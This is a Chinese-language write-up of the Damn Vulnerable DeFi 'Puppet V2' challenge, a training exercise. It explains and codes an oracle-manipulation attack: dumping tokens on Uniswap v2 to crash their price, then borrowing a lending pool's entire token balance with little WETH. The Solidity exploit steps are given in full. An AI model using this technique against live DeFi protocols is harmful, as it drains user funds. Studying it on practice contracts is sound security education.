Challenge 9 - Puppet V2
为了系统的学习solidity和foundry,我基于foundry测试框架重新编写damnvulnerable-defi的题解,欢迎交流和共建~🎉
合约
- PuppetV2Pool: 提供borrow方法,用weth换出token,token价格来自于uniswap的报价
- Uniswap-v2相关合约
测试
- 部署weth和token合约
- 部署uniswap factory、router、pair合约
- 通过与router合约交互注入流动性,token数目:UNISWAP_INITIAL_TOKEN_RESERVE,eth数目:UNISWAP_INITIAL_WETH_RESERVE
- 部署puppetV2Pool合约,向player和pool中分别转入PLAYER_INITIAL_TOKEN_BALANCE和POOL_INITIAL_TOKEN_BALANCE数目的token
- 执行测试脚本
- 期望pool中的token余额为0,player的token余额大于POOL_INITIAL_TOKEN_BALANCE
题解
这道题的攻击思路和Puppet- v1的思路类似,仍然是利用uniswap价格预言机对pool进行攻击,
值得注意的是这里使用的都是uniswap-v2,在v2中使用的是token和weth的代币对,但是player用户开始只有eth,需要与weth合约进行交互
完整的攻击流程如下图所示:
- 第一步:通过调用
swapExactTokensForTokens将player账户中的全部token换成weth,从而降低token在uniswap中的单价 - 第二步:计算借出池子中的全部token需要花费多少weth,在经过第一步后已经拿到一部分weth,再通过质押eth补齐剩余的weth
- 第三步:调用池子的
borrow方法,将pool中的全部token借出 - 第四步:(本题未做要求,可以将weth放入池子中,补足池子中的差价)
完整的步骤代码示例如下:
token.approve(address(uniswapV2Router), PLAYER_INITIAL_TOKEN_BALANCE);
address[] memory path = new address[](2);
path[0] = address(token);
path[1] = address(weth);
// swap token to weth
uniswapV2Router.swapExactTokensForTokens(
PLAYER_INITIAL_TOKEN_BALANCE, // amount in
1, // amount out min
path, // path
address(player), // to
block.timestamp*2 // deadline
);
uint256 value = pool.calculateDepositOfWETHRequired(POOL_INITIAL_TOKEN_BALANCE);
uint256 depositValue = value - weth.balanceOf(address(player));
weth.deposit{value: depositValue}();
weth.approve(address(pool), value);
pool.borrow(POOL_INITIAL_TOKEN_BALANCE);